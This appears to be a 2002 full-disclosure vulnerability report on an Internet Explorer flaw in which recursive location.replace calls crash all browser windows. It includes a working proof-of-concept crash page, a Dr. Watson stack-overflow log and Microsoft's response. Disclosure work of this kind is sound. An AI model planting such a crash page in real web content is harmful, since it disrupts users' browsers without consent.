== VULNERABILITY REPORT ==
Author: Patrik Birgersson
Object: Microsoft Internet Explorer
Remote: Yes
Local: Yes
Confirmed vulnerable configurations:
IE 6 + Windows XP Professional
IE 6 + Windows 2000 Professional SP2
IE 5.5 + Windows 2000 Professional SP2 + Pre SP3 patches
IE 5.01 + Windows 2000 Professional SP2 + Pre SP3 patches
IE 5.01 + Windows NT 4 Workstation SP4
Probably other configurations are vulnerable too.
-= SYNOPSIS =-
IE contains a flaw in its JavaScript handling that makes it possible to
crash all IE windows running in the same process.
The impact is not very heavy, but more of a principal nature, since I
believe that a web page: 1) shouldn't be able to crash the browser and
2) even if closing "it's own" window(s), shouldn't be able to affect other
browser windows.
-= DETAILS =-
If IE encounters a web page running a JavaScript that is using
location.replace and then calls itself, thus causing a loop, IE will crash
and close all IE windows running in the same process.
Here's the example code:
<html>
<head>
<script language="JavaScript">
<!--
function crashme () {
var url = document.location
if (document.images) {
location.replace(url);
} else {
location.href = url;
}
crashme ()
}
-->
</script>
</head>
<body onLoad="crashme ()">
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>
If this code is sent to the browser for execution, either served from a
web server or opened as a local file, IE will crash.
On WinXP and WinNT4 IE dies quietly and does not leave any trace of the
incident, neither in Event Log or Dr. Watson.
On Win2k however, Dr. Watson is invoked and recording the crash as a stack
overflow. Below is a snippet from a Dr. Watson log created from this
incident (wrapping may occur).
Application exception occurred:
App: iexplore.exe (pid=808)
When: 2/3/2002 @ 17:20:31.934
Exception number: c00000fd (stack overflow)
<- snip ->
State Dump for Thread Id 0x294
eax=000332a8 ebx=00000000 ecx=0000009a edx=00033288 esi=0000021a
edi=0000020a eip=77fcb12d esp=00033000 ebp=00033014 iopl=0 nv up ei pl nz
na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
function: RtlAllocateHeap
77fcb10f 55 push ebp
77fcb110 8bec mov ebp,esp
77fcb112 6aff push 0xff
77fcb114 688026f877 push 0x77f82680
77fcb119 68a79dfb77 push 0x77fb9da7
77fcb11e 64a100000000 mov eax,fs:[00000000] fs:00000000=????????
77fcb124 50 push eax
77fcb125 64892500000000 mov fs:[00000000],esp fs:00000000=????????
77fcb12c 51 push ecx
FAULT ->77fcb12d 51 push ecx
77fcb12e 81ec74010000 sub esp,0x174
77fcb134 53 push ebx
77fcb135 56 push esi
77fcb136 57 push edi
77fcb137 8b7d08 mov edi,[ebp+0x8] ss:00b105e6=????????
77fcb13a 897da4 mov [ebp+0xa4],edi ss:00b105e6=????????
77fcb13d 8065b800 and byte ptr [ebp+0xb8],0x0 ss:00b105e6=??
77fcb141 8b450c mov eax,[ebp+0xc] ss:00b105e6=????????
77fcb144 0b4710 or eax,[edi+0x10] ds:00add7dc=????????
77fcb147 89450c mov [ebp+0xc],eax ss:00b105e6=????????
77fcb14a a9600f037d test eax,0x7d030f60
<- snip ->
However, what I have been able to conclude, this stack overflow is not
exploitable.
-= VENDOR INFORMATION =-
Microsoft was informed about this issue on Feb 8 2002.
After some mail exchaning between Microsoft Security Response Center and
I, Microsoft finally stated this:
In terms of the definition of a security vulnerability which we discuss
at
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/colum
ns/security/vulnrbl.asp crashing a browser would not be regarded as a
security vulnerability.
-= CREDITS =-
* Marcus Hufvudsson for additional investigation about this issue.
* All of you that believes in full disclosure.
This archive was generated by hypermail 2b30 : Tue Mar 19 2002 - 19:22:00 PST